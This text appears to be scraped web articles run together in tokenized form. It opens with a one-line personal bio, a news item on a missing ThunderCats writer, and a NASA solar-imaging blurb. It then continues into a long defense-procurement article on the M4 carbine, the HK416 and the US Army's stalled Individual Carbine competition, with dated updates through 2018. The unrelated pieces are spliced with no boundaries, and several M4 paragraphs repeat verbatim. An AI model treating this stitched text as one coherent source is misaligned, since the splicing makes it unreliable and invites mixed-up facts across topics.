Jennifer Seager lives in Bronxville , N.Y. , and does consulting for early intervention programs in the city .
A strange disappearance has nicked the perfect record of enjoyment ThunderCats once brought to the world .
Stephen Perry , an author of several ThunderCats episodes , recently went missing amongst a mysterious and somewhat disturbing situation .
MyFox reports that Perry disappeared from his Zephyrhills , Florida home and that grisly discoveries were made in the surrounding area .
For one , a van was found nearby with a man 's severed arm inside .
More human remains were found in a dumpster at a gas station two miles away .
Perry 's home , which he shared with two roommates , was found ransacked .
The roommates , Roxanne D. Davis , 49 , and James W. Davis , 46 , had gone AWOL but were found and arrested presumably in relation to the still unfolding incident .
Both have been charged with various crimes including possession of controlled substances , violation of parole , grand theft and burglary .
Perry 's whereabouts remain unknown .
ThunderCats is an awesome animated series that ran from the mid-to - late 1980s that is sort of like a sci-fi He - Man starring cat people .
Perry wrote seven episodes of the show , also worked on SilverHawks , and had a brief stint at Marvel Comics .
He had been struggling with cancer and finances , with fans assisting him to pay rent and other bills .
It does n't seem like Perry would be the prime target for a robbery , but the situation here is quite odd and grisly so let 's just hope he ends up okay .
Via : Comic Book Resources
NASA has been wowing us with beautiful imagery from Mars and of our own planet 's volcanic activity , and now the space agency has released some spectacular photos and videos of our sun ; we 've included a few below .
The recently launched Solar Dynamics Observatory has been taking some unique portraits of our solar companion using four telescopes looking at the sun in different wavelengths .
The results are unusual and beautiful , fulfilling the mission 's goal of exploring " solar activity in unprecedented detail . "
The SDO will be sending back 1.5 terabytes of data per day , and NASA is releasing much of the footage on their YouTube channel .
You can also follow the mission on Twitter .
Sun Videos
Sun Pics
[ all img credit : NASA / SDO / AIA ]
[ via CNet ]
An M4 – or is it ?
( click to view full ) The 5.56 mm M - 16 has been the USA ’s primary battle rifle since the Vietnam war , undergoing changes into progressive versions like the M16A4 widely fielded by the US Marine Corps , “ Commando ” carbine versions , etc .
The M4 Carbine is the latest member of the M16 family , offering a shorter weapon more suited to close - quarters battle , or to units who would find a full - length rifle too bulky .
In 2006 an Army solicitation for competitive procurement of 5.56 mm carbine designs was withdrawn , once sole - source incumbent Colt dropped its prices .
The DoD ’s Inspector General weighed in with a critical report , but the Army dissented , defending its practices as a sound negotiating approach that saved the taxpayers money .
As it turns out , there ’s a sequel .
A major sequel that has only grown bigger with time .
The M4/M16 family is both praised and criticized for its current performance in the field .
In recent years , the M4 finished dead last in a sandstorm reliability test , against 3 competitors that include a convertible M4 variant .
Worse , the 4th place M4 had over 3.5 x more jams than the 3rd place finisher .
Was that a blip in M4 buys , or a breaking point ?
The Army moved forward with an “ Individual Carbine ” competition , but as the results started to show the M4 again lagging – even with ammunition changed to a round specially formulated to make the M4 shine – the Army abruptly stopped the process once again , stating that the performance superiority of the competing gun was not better to a degree making it worthwhile .
The Army stated after the tests that only a result that was twice as good as the existing gun ’s performance would signify an actionable performance difference .
More recently , the Marines have considered adding
various after - market upgrades to the platform in order to increase accuracy , learning from the private sector and competitive shooting circuit what appears to be providing the best bang .
Advertisement
The M4 Carbine
M203 on M4 Carbine
( click to view full )
It seemed like a routine request .
Order more M4 carbines for US forces in the FY 2007 supplemental , FY 2008 budget , and FY 2008 supplemental funding bills .
It has turned into anything but a routine exercise , however – with serving soldiers , journalists , and Senators casting a very critical eye on the effort and the rifle , and demanding open competition .
With requests amounting to $ 375 million for weapons and $ 150 million in accessories , they say , the Army ’s proposal amounts to an effort to replace the M16 as the USA ’s primary battle rifle – using specifications that are around 15 years old , without a competition , and without considering whether better 5.56 mm alternatives might be available off the shelf .
The M4 offers a collapsible buttstock , flat - top upper receiver assembly , a U - shaped handle - rear sight assembly that could be removed , and assortment of mounting rails for easy customization with a variety of sight , flashlight , grenade launchers , shotgun attachments , etc .
It achieves approximately 85 % commonality with the M16 , and has become a popular weapon .
It has a reputation for lightness , customizability , and , compared to its most frequent rival the AK - 47 , a reputation for accuracy as well .
The carbine ’s reputation for fast - point close - quarters fire remains its most prominent feature , however .
After Action Reviews done by the Marines after the early phases of Operation Iraqi Freedom revealed that urban warfare scenarios made employment of the M16A2 difficult in some situations ;
Marines were picking up short AK - 47s with folding butt - stocks , or scrounging pistols for use inside buildings .
Like its predecessor the M16 , the M4 also has a reputation as an excellent weapon – if you can maintain it .
Failure to maintain the weapon meticulously can lead to jams , especially in sandy or dusty environments .
Kalashnikovs may not have a reputation for accuracy , or lightness – but they do have a well - earned reputation for being able to take amazing amounts of abuse , without maintenance , and still fire reliably .
The Israeli “ Galil ” applied these lessons in 5.56 mm caliber , and earned a similar reputation .
Colt ’s M16 and M4 have never done so .
The original order for the M4 Carbine in the mid-1990s was a small - scale order , for a specifically requested derivative of the Army ’s primary battle rifle , to equip units who would otherwise have relied on less accurate 9 mm submachine guns .
As such , its direct development and sole - source contract status raised little fuss .
Subsequent contracts also raised little scrutiny .
So , what changed ?
1. Extended combat in dusty , sandy environments that highlighted the weapon ’s weak points as well as its comparative strengths , leading to escalating volumes of complaints ;
2 . The emergence of alternatives that preserve those strengths , while addressing those weak points ;
3 . The scale of the current request for funding .
Nobody Loves Me but My Mother – and She Could Be Jivin ’ Too …
XM29 OICW Prototype
( click to view full )
There have been sporadic attempts to field more modern weapons during its tenure , including the unwieldy 20 - or - so pound , 2 barrel , “ someone watched Predator too many times ” XM - 29 OICW , and more recently the aborted contract for the G36 - derived XM - 8 weapon family from Heckler & Koch .
Still , the M4 ’s designers could never sing B.B. King ’s famous tune .
The M16 / M4 family has achieved a great deal of success , and garnered many positive reviews for its features and performance .
Even its critics acknowledge that it has many positive attributes .
The M4 has also attracted criticism – and at least 1 comprehensive fix .
According to briefing documents obtained by Gannett ’s Army Times magazine :
“ USMC officials said the M4 malfunctioned three times more often than the M16A4 during an assessment conducted in late summer 2002 for Marine Corps Systems Command at Quantico , VA .
Malfunctions were broken down into several categories , including “ magazine , ” “ failure to chamber , ” “ failure to fire , ” “ failure to extract ” and “ worn or broken part , ” according to the briefing documents .
During the comparison , the M4 failed 186 times across those categories over the course of 69,000 rounds fired .
The M16A4 failed 61 times during the testing .
The Army conducted a more recent reliability test between October 2005 and April 2006 , which included 10 new M16s and 10 new M4s …
On average , the new M16s and M4s fired approximately 5,000 rounds between stoppages , according to an Army official who asked that his name not be released . ”
In a subsequent letter to the magazine , M4 manufacturer Colt argued that the US Army had disagreed with the USMC study , then added that the Army and Colt had worked to make modifications thereafter in order to address problems found .
Gannett ’s Army Times magazine also obtained a copy of Project Manager Soldier ’s Weapons Assessment Team ’s July 31 , 2003 , report :
“ The executive summary said that M16s and M4s “ functioned reliably ” in the combat zone as long as “ soldiers conducted daily operator maintenance and applied a light coat of lubricant . ”
Soldiers had their own comments , however , which were also included in the report and relayed in the magazine article .
3rd ID soldier :
“ I know it fires very well and accurate [ when ] clean .
But sometimes it needs to fire dirty well too . ”
25th Infantry Division soldier :
“ The M4 Weapon in the deserts of Iraq and Afghanistan was quick to malfunction when a little sand got in the weapon .
Trying to keep it clean , sand free was impossible while on patrols or firefights . ”
82nd Airborne Division soldier :
“ The M4 is overall an excellent weapon , however the flaw of its sensitivity to dirt and powder residue needs to be corrected .
True to fact , cleaning will help .
Daily assigned tasks , and nonregular hours in tactical situations do not always warrant the necessary time required for effective cleaning . ”
75th Ranger Regiment member , SOCOM :
“ Even with the dust cover closed and magazine in the well , sand gets all inside ; on and around the bolt .
It still fires , but after a while the sand works its way all through the gun and jams start . ”
The 507th Maintenance Company , ambushed outside Nasariyah in 2003 during the opening days of the ground invasion of Iraq , might concur with all of the above .
The post - incident report released by the US Army had this to say :
“ Dusty , desert conditions do require vigilance in weapons maintenance …
However , it is imperative to remember that at the time of the attack , the 507th had spent more than two days on the move , with little rest and time to conduct vehicle repair and recovery operations . ”
Even without those extenuating circumstances , however , there have been problems .
A December 2006 survey , conducted on behalf of the Army by CNA Corp. , conducted over 2,600 interviews with Soldiers returning from combat duty .
The M4 received a number of strong requests from M - 16 users , who liked its smaller profile .
Among M4 users , however , 19 % of said they experienced stoppages in combat – and almost 20 % of those said they were “ unable to engage the target with that weapon during a significant portion of or the entire firefight after performing immediate or remedial action to clear the stoppage . ”
The report adds that “ Those who attached accessories to their weapon were more likely to experience stoppages , regardless of how the accessories were attached [ including via official means like rail mounts ] . ”
Since “ accessories ” can include items like night sights , flashlights , etc. , their use is not expected to go away any time soon .
US Army Ranger Capt .
Nate Self , whose M4 jammed into uselessness during a 2002 firefight after their MH - 47 Chinook was shot down in Afghanistan ’s Shah - i - kot Mountains , offers another case .
He won a Silver Star that day – with another soldier ’s gun – and his comments in the Army Times article appear to agree that there is a problem with the current M4 design and specifications .
M4 SOPMOD
( click to view full )
SOCOM appears to agree as well .
While US Special Operations Command is moving ahead on their own SCAR rifle program with FN Herstal , they ’re also significant users of the M4 Carbine ’s SOPMOD version .
By the time Capt .
Self was fighting of al - Qaeda / Taliban enemies in Afghanistan with a broken weapon , Dellta Force had already turned to Heckler & Koch for a fix that would preserve the M4 but remove its problems .
One of which is heat build - up and gas from its operating mechanism that dries out some lubricants , and helps open the way for sand damage .
In response , H&K replaced Colt ’s “ gas - tube ” system with a short - stroke piston system that eliminates carbon blow - back into the chamber , and also reduces the heat problem created by the super - hot gases used to cycle the M4 .
Other changes were made to the magazine , barrel , etc .
The final product was an M4 with a new upper receiver and magazine , plus H& K ’s 4 - rail system of standard “ Picatinny Rails ” on the top , bottom , and both sides for easy addition of anything a Special Operator might require .
HK416 , labeled
( click to view full )
In exhaustive tests with the help of Delta Force , the upgraded weapon was subjected to mud and dust without maintenance , and fired day after day .
Despite this treatment , the rifle showed problems in only 1 of 15,000 rounds – fully 3 times the reliability shown by the M4 in US Army studies .
The H&K 416 was declared ready in 2004 .
A rifle with everything they loved about the M4 , and the fire - no - matter - what toughness of the Kalashnikov , was exactly what the Deltas ordered .
SOCOM bought the first 500 weapons right off the assembly line , and its units have been using the weapon in combat ever since .
Other Western Special Forces units who liked the M4 Carbine have also purchased HK416s , though H&K declines to name specific countries .
US Major Chaz Bowser , who has played a leading role in SOSOCM ’s SCAR rifle design program :
HK416 : Desert Testing
( click to view full )
“ One thing I valued about being the weapons developer for Special Operations is that I could go to Iraq or Afghanistan or anywhere with whatever weapons I wanted to carry .
As soon as the H&K 416 was available , it got stuffed into my kit bag and , through test after test , it became my primary carry weapon as a long gun .
I had already gotten the data from folks carrying it before me and had determined that it would be foolish to risk my life with a lesser system . ”
Actually , they do n’t even have to buy the whole gun .
Christian Lowe of Military.com reports that :
“ In a routine acquisition notice March 23 [ 2007 ] , a U.S. Special Forces battalion based in Okinawa announced that it is buying 84 upper receiver assemblies for the HK416 to modify their M4 carbines …
According to the solicitation for the new upper receiver assemblies , the 416 “ allows Soldiers to replace the existing M4 upper receiver with an HK proprietary gas system that does not introduce propellant gases and the associated carbon fouling back into the weapon ’s interior .
This reduces operator cleaning time , and increases the reliability of the M4 Carbine , particularly in an environment in which sand and dust are prevalent . ”
But the US Army wo n’t consider even this partial replacement option .
The Army position was reiterated in a release on April 2/07 :
“ The M4 Carbine is the Army ’s primary individual combat rifle for Infantry , Ranger , and Special Operations forces .
Since its introduction in 1991 , the M4 carbine has proven its worth on the battlefield because it is accurate , easy to shoot and maintain .
The M4’s collapsible stock and shortened barrel make it ideal for Soldiers operating in vehicles or within the confines associated with urban terrain .
The M4 has been improved numerous times and employs the most current technology available on any rifle / carbine in general use today .
The M4 is the highest - rated weapon by Soldiers in combat , according to the Directorate of Combat Development , Ft. Benning , Ga . In December 2006 , the Center for Naval Analysis conducted a “ Soldiers ’ Perspective on Small Arms in Combat ” survey .
Their poll of over 2,600 Soldiers reported overwhelming satisfaction with the M4 .
The survey included serviceability and usefulness in completing assigned missions in Iraq and Afghanistan . ”
The Cry for Competition : How Much Is That HK
In the Window ?
HK416s
( click to view full )
The HK416 is n’t the only alternative out there by any means – but it has been a catalytic alternative .
In an analogous situation , limited USMC deployment of mine - resistant vehicles like Force Protection ’s Cougar and Buffalo in Iraq , and the contrast between v-hulled casualties and Hummer casualties , led to a cascade that now looks set to remove the Hummer from a front - line combat role .
The technology to deal with insurgencies that used land - mines has been proven for over 30 years – but awareness of that fact did n’t rise within the US military and among its political overseers until an obvious counter - example was fielded .
One that demonstrated proven alternatives to the limited options people had previous been shown .
Likewise , the use of the high - commonality HK416 has served to sharpen awareness that the M4 might not be the best option on offer for US forces .
Couple that with a major buy that looks set to re-equip large sections of the US military with a new battle rifle , and the question “ what if we can do better ? ” starts to take on real resonance .
The Army ’s $ 375 million sole - source carbine procurement , on the basis of specifications that have not been changed to reflect these realities , is starting to raise hackles – and attract a wide spectrum of opponents .
Gannett ’s Army Times quoted former Army vice chief of staff Gen. Jack Keane ( ret. ) , who tried at the end of his tenure to update the USA ’s infantry rifle with the XM - 8 project , as saying :
“ We are not saying the [ M4 and M16 are ] bad , ” said “ The issue for me is do our soldiers have the best rifle in their hands …
The fact of the matter is that technology changes every 10 or 15 years and we should be changing with it .
And that has not been our case .
We have been sitting on this thing for far too long . ”
An aide to Sen . Tom Coburn [ R - OK ] agreed , and added that the substantial price reduction created by the mere threat of an open competition in 2006 was evidence that Colt had been using its sole - source status to overcharge the government .
The Senator has sent a formal letter to the Secretary of the Army requesting an open competition in order to ensure both the best deal , and the best off - the shelf rifle that incorporates modern improvements .
The winner could well be Colt , said Coburn ’s aide – but they should have to prove it , and earn it .
“ This is supposed to be a battle rifle . ”
He said .
“ We ’re supposed to have a rifle that just does n’t jam . ”
Impossible , of course – but one that jams far less often , and requires far less maintenance to avoid jams , while offering all of the M4 ’s compactness and add - on ease … that would represent a significant step forward .
Ironically , even Colt may have a better system ready to go .
In a letter to Army Times magazine , Colt COO James R. Battaglini ( US Marine Corps Maj. Gen. , ret . ) said :
“ The gas piston system in the H&K 416 is not a new system .
Rifles were being designed with these systems in the 1920’s .
Colt proposed a piston operated weapon to the Army in the early 1960 ’s .
Today Colt Defense has the ability and expertise to manufacture in great numbers piston system carbines of exceptional quality should the U.S. military services initiate a combat requirement for this type of weapon ”
Unfortunately , fighting the Army for improvements is no easy task .
Colt CEO William Keys , who is also a retired USMC General , explained out to Army Times that Colt has to build what the US Army asks for , to the Army ’s exact specifications :
“ If we have a change that we think would help the gun , we go to the Army … which is not an easy process , by the way .
We spent 20 years trying to get [ an extractor ] spring changed .
They just said ‘ well , this works good enough . ’ “
Sen .
Coburn ’s letter to Secretary of the Army Peter Green took a dim view of this entire situation :
“ I am concerned about the Army ’s plans to procure nearly a half a million new rifles outside the any competitive procurement process …
There is nothing more important to a soldier than their rifle , and there is simply no excuse for not providing our soldiers with the best weapon – not just a weapon that is “ good enough ” …
In the years following the Army ’s requirements document [ DID : for the M4 in the early 1990s ] , a number of manufacturers have researched , tested , and fielded weapons which , by all accounts , appear to provide significantly improved reliability .
To fail to allow a free and open competition of these operational weapons is unacceptable …
I believe the Army needs to rapidly revise its rifle and carbine requirements .
Free and open competition will give our troops the best rifle in the world … ”
The positions were , and are , clear .
The US Army says the M4 is n’t broken , and adds that an Army - wide fix would cost $ 1 billion .
Critics contend that these costs may be exaggerated given some of the potential solutions , and add that an army already planning to spend $ 525 million to re-equip the force with M4s has a moral and financial imperative to see if a better rifle exists .
Meanwhile , calls about the M16 / M4 had been coming in from Oklahoma , and other Senators and representatives had also been hearing from constituents on this matter .
By 2007 , a second letter from the Senate was likely if the Army dug in its heels – and that letter would have had far more signatures at the bottom .
In the end , however , legislative tactics forced the Army ’s hand .
The issue finally came to a head when Sen. Coburn [ R - OK ] exercised his ability as a Senator to block nomination of the proposed new Secretary of the Army , until the US Army relented and agreed to testing at the Army ’s Aberdeen Test Center in Maryland .
Secretary Geren was confirmed shortly thereafter , in July 2007 .
The tests were conducted .
The M4 finished last .
The Army declared that performance to be acceptable .
By 2010 , however , there were noises about an “ Individual Carbine Competition ” , which became a full solicitation .
A number of firms are lining up to provide new designs for the Army ’s next - generation carbine , including Colt .
Some of them even offer alternate caliber options that could make a real difference to lethality at range , a serious need in environments like Afghanistan .
By August 2011 , known competitors and designs included :
Smith & Wesson was also reported to be entering the competition , but eventually decided not to take part .
The bigger question is whether this competition , like the ones before it , will ultimately prove to be an expensive mirage .
As of April 2013 , in the words of the old magic 8 - ball , “ signs point to yes . ”
Though one could also use “ outlook not so good . ”
Any Last Words ?
G36s : Norwegian
Telemark battalion
by Torgeir Haugaard
( click to view full )
Sgt. Charles Perales of Fort Bragg , NC had this to say in a letter reprinted by Defense News :
“ My unit – B Company , 2nd Battalion , 504th Parachute Infantry Regiment – was deployed to Afghanistan from April 2005 to March 2006 .
While there , we were attached to Special Forces at Camp Tillman on the Afghan border …
I saw first - hand what happens when your weapon jams up because of the harsh environments we have to call home there .
An 18B weapons sergeant was shot in the face due directly to his weapon jamming .
I just ca n’t believe that after things like this happen , the Army is still buying more M4s .
Why not rotate them like we used to before the war ?
All rapid - deploying units used to get the new M4 , the support units would get the excess M16s and so on .
I ’m not saying they need to outfit the whole Army with a new weapon , but why not start phasing it in ?
… Soldiers ’ lives are on the line .
Why is it a hassle to make an improvement that could save lives ?
The M4 is n’t a bad weapon ; it just needs improvements .
It ’s about time people stop fighting to keep things the same and start moving toward a better weapon system . ”
The last word will be left to SOCOM ’s Major Chaz Bowser :
“ We buy new laptop computers every few years across the gamut , so could n’t we do the same with our single most important piece of military equipment ? …
Waiting for a leap - ahead technology based on a kinetic energy weapon platform is a waste of time and money , so we need to look at what is out there now …
What the Army needs is a weapon that is now ready for prime - time and not a developmental system …
The requirement comes from the field , not from an office in some garrison activity , not from some consultant and definitely not from a vendor .
Let ’s do this quickly without all the bureaucracy typically associated with change .
Find someone in our ranks who can make a decision – who has n’t floated a retirement resume with a gun company – and make the decision now .
Just look how fast we were all issued the ‘ highly coveted ’ black beret or the digital uniform .
Find that recipe card , change out the word ‘ Velcro ’ with ‘ battle rifle ’ and that may be a start to finding a solution [ DID : which , he acknowledges , could be Colt ’s M4 if that ’s what the competition shows ] .
Our men and women deserve much better than we are giving them , and shame on us . ”
Updates : The Tests , Reactions , and Subsequent Developments
FY 2018 Army looks to cancel Individual Carbine ; USMC wo n’t join IC ; Smith & Wesson out – will sell their innovations to law enforcement and civilians .
Remington ACR
( click for video )
November 12/18 : Maintenance & Operations Colt ’s Manufacturing Company is being contracted to maintain the US Army ’s inventory of M4 and M4A1 rifles .
The contract is valued at $ 88.6 million and funded through FY2019 and FY2020 operations and maintenance funds .
The M4 offers a collapsible buttstock , flat - top upper receiver assembly , a U - shaped handle - rear sight assembly that could be removed , and assortment of mounting rails for easy customization with a variety of sight , flashlight , grenade launchers , shotgun attachments and so forth .
It ’s the successor to the M - 16 with which it shares a 85 % commonality .
The M4A1 is the special operations version of the M4 that ’s been in use for more than a decade .
It features a heavier barrel and a full - auto trigger .
Work will be performed at Colt ’s factory in West Hartford , Connecticut .
The contract is set to run through September 25 , 2020 .
September 24/18 : FMS
The governments of Jordan , Morocco , Afghanistan , Senegal , Tunisia and Pakistan are set to receive additional rifles as part of US Foreign Military Sales .
Colt will provide the countries with up to 10,000 additional M4 and M4A1 5.56 mm carbine rifles at a cost of $ 57.7 million .
The M4 / M4A1 Carbine is a lightweight , gas operated , air cooled , magazine fed , selective rate , shoulder fired weapon with a collapsible stock .
It is now the standard issue firearm for most units in the US military .
The M4 offers a collapsible buttstock , flat - top upper receiver assembly , a U - shaped handle - rear sight assembly that could be removed , and assortment of mounting rails for easy customization with a variety of sight , flashlight , grenade launchers , shotgun attachments , etc .
Like its predecessor the M16 , the M4 also has a reputation as an excellent weapon – if you can maintain it .
Work will be performed at Colt ’s facility in West Hartford , Connecticut , and is scheduled for completion by September 2019 .
July 31/18 : SOCOM SURG
The US Special Operations Command is procuring upgrades for its M4A1 rifles .
Sig Sauer is set to supply SOCOM with the Suppressed Upper Receiver Group ( SURG ) .
The five - year firm - fixed - price contract has a value of $ 48 million .
The M4 Carbine is the latest member of the M16 family , offering a shorter weapon more suited to close - quarters battle , or to units who would find a full - length rifle too bulky .
SURG is a 5.56 mm , integrally suppressed upper receiver .
This short stroke gas piston upper features a 6.75 ?
barrel with a permanently attached 19 baffle , Titanium suppressor .
It has two gas settings for use with sub and supersonic ammunition .
Short stroke gas pistons eliminate carbon blow - back into the rifles chamber , and also reduce the heat problem created by the super - hot gases used to cycle the M4 .
The majority of work will be performed at the company ’s location in Newington , New Hampshire and is expected to be completed by July 2023 .
FY 2012 – 2016
January 13/16 : Remington has completed its $ 40.1 million delivery of M4 carbine rifles to the Philippine Army ahead of schedule .
Over 56,000 of the rifles have been delivered in total , and will replace the antiquated 1960s era variant of the M - 16 currently in use by the PA .
Prior to distribution , a third of the new arms will undergo mandatory ballistic testing while the M - 16s will be distributed to reservists .
March 16 / 15 : The Army released a Sources Sought notice ( W15QKN - 15 - X- 7820 ) , looking for one vendor that can bundle together a series of aftermarket improvements to the M4A1 carbine .
The package , to be called the M4A1 + , includes increased accuracy , rails , mounting surfaces , neutral , non-black , color , coatings , backup sites and a kitchen sink full of other , smaller improvements .
Feb 18/15 : The Marines are considering adding
various after - market upgrades to the platform in order to increase accuracy , learning from the private sector and competitive shooting circuit what appears to be providing the best bang .
June 14/13 : The Army excuses their decision to cancel the Individual Carbie competition by saying that none of the candidates met their criteria of 3,592 mean rounds between stoppages , using the new M855A1 Enhanced Performance Round .
As a point of comparison , the original requirement for the M4 was 600 .
The Army ’s PEO Soldier says that SOCOM ’s M4A1 achieved 1,691 MRBS , but refuses to release the results of the trials and provide a basis for relative comparison .
Military.com .
May 2/13 : Military.com reports that the Individual Carbine ’s Phase II firing tests are done , but the US Army is about to cancel the Individual Carbine competition , and direct its tiny $ 49.6 million in FY 2014 to other things .
The original plan involved 3 Phase III contracts , and soldier user tests that would include a total of 800,000 rounds fired .
Overall , the budget for new carbines is $ 300 million through 2018 , and the decision on how to proceed reportedly rests with Secretary of the Army John McHugh .
This paragraph sums it up best :
“ Gun makers involved in the competition said they have heard nothing from the Army about Phase III of the competition .
Competitors did n’t want to be named in this story but said they would not be surprised if the effort was canceled because they never believed the Army was serious about replacing the M4 family . ”
March 19 / 13 : Inspector General .
In testimony before the House Committee on Oversight and Government Reform , the Pentagon ’s Inspector General says they ’ll audit the Individual Carbine program , as “ DoD may not have an established need for this weapon nor developed performance requirements … such as accuracy , reliability , and lethality ” .
Aside from the presumptuousness in the wake of incidents like Wanat , they ’re also absolutely wrong on a factual level – the IC competition has had those standards for 3 years now .
Source .
Aug 1/12 : Political .
Sen . Tom Coburn [ R - OK ] delivers a floor speech about the M4 and the Army ’s failure to replace it .
He reminds the Senate about the dust testing in which the M4 came in last , and points out that the average rifle age is 26 years , compared to 12 years in Germany , or 8 years for US Special Forces .
The Army has been able to rush MRAP competitions for much more expensive equipment , but :
… secretary of Army Guerin … assured me that we would have a new competition for a new rifle for our troops .
That was 2007 .
Here we are , six years later , and the army is now telling us we ’re going to have a new competition in 2014 …
Because the guys that are responsible for making the decision on purchasing the rifles are not the guys that are out there on the line .
Because if they were , we would have already had this competition …
On July 13 , 2008 , in the battle of Winot [ sic ] in Afghanistan , 200 Taliban troops attacked the U.S. troops at a remote outpost in Eastern Afghanistan .
The Taliban were able to break through our lines …
Believe it or not , do you know what killed most of us ?
Our own rifles .
Practically every one of our dead was found with his m - 16 torn down next to him where he had been trying to fix it .
That ’s occurring now .
Except it ’s not getting any press .
… You know , a lot of people do a lot of things for our country , but nobody does for our country what the soldier on the frontline does – nobody .
Mr. secretary of the Army .
This is a moral question .
Get the rifle competition going .
Members of congress , members of the senate who are on the armed services committee do n’t allow this to continue to happen .
Nov 17/11 : USMC sticking with M16A4 & M27 IAR .
Military.com reports that the USMC has considered the HK416 - derived M27 IAR as a future individual weapon , but decided to stick with improvements to the M16A4 rifle for that role .
It also means that the Marines wo n’t be adopting the winner of the Army ’s Individual Carbine competition , which lowers the odds of having IC turn into a contract for a new weapon .
HK might still walk away a winner in the USMC , though .
The M27 IARs are being evaluated as future substitutes for FN ’s M249 5.56 mm light machine gun , and have been fielded to Afghanistan in a combat trial .
Nov 10 / 11 : Smith & Wesson out .
Military Times ’ Gear Scout reports that Smith & Wesson wo n’t be competing in the Individual Carbine :
“ I talked to David Holt , S&W ’s VP of Military Programs who confirmed [ the M&P4 ] was S&W ’s entry into the U.S. Army ’s individual carbine competition .
He explained the company ’s decision not to compete in the Army ’s search for a new carbine … cited the program ’s long acquisition timeline as one of the factors that made it difficult for Smith and Wesson to assume the risk of joining the carbine fray …
They ’ve put a lot of hours into the project and are very proud of the reliability improvement ’s [ sic ] they ’ve made over the M4 design .
So , the carbine will likely end up for sale on the commercial LE / Gov market … ”
FY 2009 – 2011 M4s and M249s fail at the Battle of Wanat ; Key “ Taking Back the Infantry Half - Kilometer ” report leads to caliber questions ; SOCOM cancels FN’s 5.56 mm SCAR-L ; US Army going through the competition motions , slowly , and giving mixed signals .
B.E.A.R. in detail
click for video
Aug 8/11 : ADCOR .
Military.com covers ADCOR ’s announced interest in the IC competition , and its B.E.A.R. design .
It ’s a gas piston system with some clever features for keeping dust out , a free floating barrel , an adjustable cyclical rate , faster and simpler cleaning , and a “ forward charging handle ” that lets the soldier clear a jammed weapon with their off hand ( also present in Remington ’s ACR ) .
Military.com | ADCOR page .
June 21/11 : Data Rights Issue . Daniel E. Watters of The Gun Zone explains how the Army got here , the deal with Colt , and the difficulty they ’ll have getting a new weapon in the Individual Carbine competition .
Read “ Colt M4 Data Rights & The Individual Carbine Competition . ”
June 14/11 : M4 . FBO.gov releases Presolicitation W56HZV - 10 - R-0593 , covering 70,000 – 100,000 M4 and M4A1 carbines over 5 years .
The Government expects to order 25 - 30 % in each of years 1 and 2 , and 13 - 17 % in each of years 3 through 5 .
They ’re certainly serious about the M4 , if not about its replacement .
The contractor (s ) winning the best value competition will also be required to provide ancillary equipment as specified by the contract , and will be paid only for produced items , not for setup and manufacturing costs .
Bidding is restricted to firms in the U.S. & its territories , and the carbines will be produced in accordance with the M4 / M4A1 Technical Data Package ( TDP ) and the license agreement between the U.S. Government and Colt Defense , LLC .
That TDP is restricted / export controlled , and requires submission of a Non-Disclosure Agreement .
The TDPs will not be available until an NDA is submitted , and an FBO.gov solicitation is issued .
Read “ Colt M4 Data Rights & The Individual Carbine Competition ” for an analysis of how the Army reached this point , and what it could mean in practice .
June 14/11 : Competition .
Defense Procurement news reports that the US Army still has a 2 - track strategy ( vid. March 10 / 10 entry ) .
One is the IC competition .
The other involves competing the M4 design , now that the Army and not Colt owns the data rights .
Colt has reportedly reacted to the announced Army plans by ramping up their lobbying efforts , so Congress can pressure the Army to keep the program with them .
May 25 / 11 : Lobbying .
An Associated Press article lays out the hired lobbyists and political backers for some of the Individual Carbine contenders , while discussing possible offerings .
See also Fox News ‘ coverage .
Contenders , and their lobbyists , include :
Colt :
CM901 multicaliber rifle ( 5.56 mm – 7.62 mm )
Roger Smith , a former deputy assistant Navy secretary @ $ 120,000 a year
Rep. Rosa DeLauro [ D - CT , Appropriations ] .
Rep. John Larson [ D - CT ] , Sen. Joe Liberman [ I - CT , retiring ] .
FN Herstal :
SCAR -L 5.56 mm .
American Business Development Group @ $ 120,000 / year .
Sen. Lindsey Graham [ R- SC , SASC ] , Joe Wilson [ R- SC , HASC ] .
HK USA :
HK416 5.56 mm .
Parted ways with Greenberg Traurig in 2009 , and with Mark Barnes and Associates in early 2010 .
No replacement mentioned .
Remington :
Adaptive Combat Rifle multi-caliber ( 5.56 mm or 6.8 mm ) .
$ 500,000 over last 2 years to Winborn Solutions , and Nelson Mullins Riley & Scarborough
Sen. Chuck Schumer [ D - NY ]
Smith & Wesson :
( M& P4 , will not be entering the competition )
Greenberg Traurig @ $ 360,000 / year
April 18/11 : Competition .
In published responses to questions from industry over Draft RFP W15QKN - 11 - R-F003 , the US Army has laid out a schedule for its “ Individual Carbine ” .
The RFP is expected in May 2011 , with Phase 1 evaluations from July to October 2011 , and Phase 2 evaluations extending to July 2012 .
The contracts , if any , would be awarded in October 2012 , followed by even more evaluations of the remaining contenders , lasting until March 2013 .
While there is no caliber or mechanical type requirement , the Army may not choose to do anything , in the end .
It is openly espousing a “ dual path ” strategy to upgrade existing M4s , even as it launches this competition .
Given a long past history of declaring that new designs do n’t offer enough benefits over existing M4s to justify a purchase , outside observers can be forgiven any skepticism they may have over the Army ’s determination to field anything else when all is said and done .
PROCNET Q&A responses | PEO Soldier | Gannett ’s Army Times | Aviation Week Ares .
Jan 31/11 : Competition .
The US Army issues Draft RFP W15QKN - 11 - R-F003 for an “ Individual Carbine . ”
In practice , the solicitation announces an Industry Day on March 30 / 11 , and offerors are directed to NOT submit proposals at this time .
Interested parties are advised that only firms within the Small Arms Industry will be granted admittance at the Doubletree Hotel Washington DC – Crystal City , and that ITAR export control procedures are in effect .
Col .
Doug Tamilio , the service ’s project manager for soldier weapons , reportedly said in a statement that “ We ’re challenging industry to develop the next - generation carbine and we ’re looking forward to the results . ”
On the other hand , there have been previous industry days ( vid. 2008 ) , and other next - generation carbines have been shelved in the past , on the nebulous ground of not being enough of an improvement over the M4 .
FedBizOpps | Wall St. Journal .
SCAR - L top , SCAR - H
( click to view full ) June 25/10 : FN SCAR .
Military.com reports that SOCOM has decided to cancel further 5.56 mm SCAR -L Mk.16 rifle purchases on cost and efficiency grounds , and will probably recall the 850 fielded weapons , rather than continue to support them .
SOCOM will be adding to their stock of 750 7.62 mm SCAR - H Mk.17 riles , however , and will field an extended SCAR - H Mk.20 with sharpshooter enhancements .
SOCOM cancels 5.56 mm SCAR -L
March 10 / 10 : Competition .
In testimony before the House Armed Services Subcommittee on Air and Land Forces , senior Army officers state that [ PDF ] :
“ We are currently taking a dual approach to improve the current weapon , the M4 , as we move forward with a new carbine requirement .
The Project Manager ( PM ) released a market survey in January 2010 , seeking the best industry has to offer for improvements to the current M4 .
